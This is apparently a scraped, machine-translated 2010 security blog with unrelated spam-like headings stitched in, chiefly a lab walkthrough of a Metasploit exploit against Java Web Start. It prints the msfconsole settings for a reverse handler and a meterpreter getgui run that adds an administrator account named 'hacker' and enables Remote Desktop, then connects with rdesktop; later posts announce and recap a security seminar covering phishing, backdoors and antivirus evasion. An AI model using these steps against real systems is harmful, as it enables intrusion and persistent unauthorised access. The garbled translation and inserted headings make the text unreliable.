Wednesday, May 12, 2010

How To Know Whenscorpio Man Still Loves You

Apache Java Web Start Metasploit + Remote Desktop Getgui

Metasploit Another one laboratory. I think this is one of the most dangerous exploit compared to the previous showing, because what i was trying and fails to be detected by AV. The fault lies in the Java Web Start, the binary called javaws.exe, the problem is that the URL validation is minimal so you can make an injection of arbitrary code. This fault was discovered in parallel by Tavis Ormandy and Ruben Santamarta
the command line "-XXaltjvm" and interestingly

"-J-XXaltjvm" (see javaws.exe switch-J). This tells Java to load JavaVM alternative library (jvm.dll or libjvm.so) from the desired path. End of game. We can set-XX

altjvm = \\ \\ IP \\ evil, so evil javaw.exe load our jvm.dll. Adios ASLR, DEP .. . "Santamarta said in a statement.



A good paper on the failure is explained in this link


To run this exploit from Metasploit Framework, we must be on a machine as root and not have any SMB server running, the other requirement is that the victim machine has to be the WebClient on. The way to check if the service is running
C: \\> sc query WebClient



Metasploit
Test utulizaremos failure to demonstrate the popular Metasploit, and exploit called java_ws_arginject_altjvm loaded. Below is the entire script to load the exploit payloads but the things you saw earlier in the previous publications on metasploit:)


# msfconsole
_ _ _
SRVHOST => 192.168.56.1
msf exploit (java_ws_arginject_altjvm)> September 
 
 Lhoste Lhoste 192.168.56.1 => 192.168.56.1 
 msf exploit (java_ws_arginject_altjvm)> 
 September 3333 lport

lport => 3333 msf exploit
(java_ws_arginject_altjvm )>
[*] Started on 192.168.56.1:3333 reverse handler [*] Using URL: http://192.168.56.1:80/ [*] Server started.


is now only the victim log onto our server started by the MSF with malignant HTML page. 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 Virtual Machine is an XP SP 3 and Java Version is: 
   C: \\ Documents and Settings \\ victim 2> java-version 
   java version "1.6.0_18" 
 
  Java (TM) SE Runtime Environment (build 1.6.0_18-b07) Java HotSpot  
 
 (TM) Client VM (build 16.0-b13, mixed mode, sharing)   
 
 Java update is recommended for a later version,   to 1.6.0_20 from 
, is where the patch 
, 
 because it is considered 
 
 maximum criticality of this vulnerability 
. 
 Of all the exploits I've tried on browser so far, this is one of the most dangerous, since it is independent of the browser, and AV so far (as noted eh), do not have a signature, although I paresca odd ..


REMOTE DESKTOP


When we get a session of meterpreter, we have many features, such as migrating processes, keyloger, screenshot, capture the keys, etc..
The option that we will see, is a script that opens a Terminal Server on the victim machine, but so that we can use them without any problems we will have to modify the code to place a user in the Administrators group
in version English windows. Script GETGUI

called to modify where are we going to script files in my case:
/ opt/metasploit3/msf3/scripts/meterpreter

On this route are the meterpreter script.
As you see, the
getgui
gives us some options where one of them is language, with the-l will pass but there is only type in English and German .



meterpreter>
getgui-h
run Windows Remote Desktop Enabler Meterpreter Script Usage: getgui-u-p Or: getgui-e OPTIONS:
-e Enable RDP only. Forward-f

RDP Connection.
-h Help menu.
-l The language switch
Possible Options 'de_DE', 'en_EN' / default is: 'en_EN'

-p The password of the user to add. -u
The Username of the user to add.






What we do is edit the file getgui.rb

# nano / opt/metasploit3/msf3/scripts/meterpreter/getgui.rb
we went
to line 113 and change this piece of code lang 
 
 case when "en_EN"  RDU = "Remote Desktop Users" admin  = "Administrators" 
 when "de_DE" 
 RDU = "Remotedesktopbenutzer"  admin = "Administrator"  
 
 
 
 
 end with this one 
  
 
  case lang when "en_EN" 
 RDU = "Remote Desktop Users" admin  = "Administrators"  when "de_DE" 
 RDU = "Remotedesktopbenutzer"  admin = "Administrator" 
 when "en_US"  RDU = "Remote Desktop Users" admin 
 = "Administrators" 
 
  end     Once we have changed, now we're at our sessions of meterpreter and run.


meterpreter > run getgui -u hacker -p 123456 -l es_ES
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com [*] Language set by user to: 'es_ES' [*] Enabling Remote Desktop [*] RDP is already enabled [*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Setting user account for logon 
  
 [*] 
       
 Adding User: hacker with Password: 123456 
  
  
 [*]     Adding User: hacker to local group 'Remote Desktop Users' 
 
 
 [*] Adding User: hacker to local group 'Administrators'

[*] You CAN now login with the user created 


 
 
 What makes this is to create a user with password 
 hacker 
 
 123456 
 the group "Administrators" and which can be accessed right through the Remote Desktop Users "Remote Desktop Users." 
 Now to see if it works, go to a shell and the program rdesktop 
 
 we connect. (If you got it and you're in distros like debian or aptitude install rdesktop). 
 
 
 $ rdesktop 
 
 192.168.56.101 
 


 
 
   
 
 
 
 
 
 
 
 
 
    That's all Greetings  
   REFERENCES 
   
 http://blog.metasploit.com/2010/04/ java-web-start-argument-injection.html 
 
 
 http://seclists.org/fulldisclosure/2010/Apr/119


http://www.pentester.es/2010/05/explotando-java- web-start.html http://www.pentester.es/2010/05/vulnerabilidad-en-java-web-start.html
http://threatpost.com/es_la/blogs/nueva- failure-in-java-affects-all-the-versions-of-windows-040 910

Posted by admin at 7:43 PM 0 comments

Waffle Hot Dog Recipe

First Seminar Synthesis

Well on Saturday 8 of the current month, Del Prado I looking at 5 am to go with Sergio Lovera and Gerardo Faifer. First stop RCIA. to get him home Cacivio and Marina, we unloaded the car a few mates 2 of the new Dell I buy Cacivio to encourage him, and started to Formosa. We arrived by 8 am with the help of GPS Prado. Well was giving the schedule is different from being in this way.
















Internet Danger - Metasploi
Framework and using Backdoor

.


  1. (Speaker: Juan Francisco Bosco ) Phishing - Theft and use of information . (Speaker: Sergio Lobera)

  2. 12:00 pm . INTERMEDIATE - With roasted on a barbecue;)





Identity Theft and Data Security


(Presenter: Pedro Matías

Cacivio )

  1. Analysis Forensic (Presenter: Sebastian del Prado) Use of PHP for Hackers (Presenter: Alejandro Zapiola) By emphasizing the organization estubo very good, boys Micronet were very efficient in that respect, from cafe, chipacitos, a large living room, accreditation ETC. We hope to encourage him back further and further seminar. Here are some pictures! Show In my

  2. Micronet Boys







ACA MORE PHOTOS OF THE EVENT IS ALREADY INCREASE;) GREETINGS

Posted by admin at 8:41 AM 0 comments

Tuesday, May 4, 2010

Chocolate Color Accent Wall

Formoss Safety 1st Computer Security Seminar - Formosa Festival 2010

This Saturday May 8 traveled to Formosa

with

group
encourage him to hold a seminar on Security as the title says. We're very entusismados because we love to do these events, and incidentally find cities in Argentina that is beautiful and has no way inferior to any country.

As always in these events is meeting new people, if you're lucky a good friend and learned a lot. Without much else to say leave them below the topics that will be given and who are about to go, going to be good, there are a lot of content related between talks. People

by Formosa we Capital,

room where the event takes place is in " Salon de Actos
Provincial Highway." More information
HERE




8:00 pm

.


ACCREDITATIONS



8:30 pm .

Identity Theft and Data Security (Presenter: Pedro Matías

Cacivio

) Today inadvertently left a lot of information on the Internet "passwords, phone numbers, e-mail , addresses, photos, etc. in different databases, all designed to keep our privacy . What happens when an experienced attacker to access all our information? This talk will look like fully may violate the security of these bases making all the information. Which can be used against us, while the attacker completely invisible on the net, committing crimes without trace and without any possibility of getting caught. 10:00 pm .

Phishing

- Theft and use of information

.

(Speaker: Sergio Lobera) will demonstrate how a person can through social engineering, collecting vital data to theft identity theft accounts and use them. be taught ways detection of these, protection and subsequent complaint ( blacklist ) of sites and domains phishers. Finally will attack through phishing obtained with multiple passwords for all accounts (Rapidshare , Facebook

,

Paypal, etc).

12:00 pm . INTERMEDIATE


13:30 pm .

Internet Danger - Metasploi Framework and using Backdoor
.

(Speaker: Juan Francisco Bosco ) is displayed as an attacker, exploiting security flaws using the internet as a means of access to personal computers , involving them in their entirety, and the data contained in it, for they will use a free tool Metasploit Framework bug and operating systems. Also show how to create backdoor and use Crypt bypasses for firms the Avs, as compromising its victims invisible. 15:00. Use PHP Hackers (Presenter: Alejandro Zapiola) This talk will focus on how the cyber-terrorists use PHP to create tools, theft of cookies, XSS flaws and programming errors PHP, exploiting them and then take over the identity of his victim, then we will see how to overcome these shortcomings.

16: 00 hs.






Intruder Detection System IDS

(Presenter: Sebastian

del Prado) speak on is proper installation, configuration and planning of safety rules, using a free Snort IDS , will also be handling sniffer , Oink Master (updated rules). Installing IPCop (security Linux distribution has Snort as the main engine) in a pleasant interface, IPTABLES management, handling of environments (Green, Blue, Orange topologies installation "), is displayed Videos with examples of real attacks and how they are displayed, etc.

18:00 pm . CLOSING . Delivery of Certificates .


Posted by admin at 9:15 PM 0 comments
Subscribe to: Comments (Atom)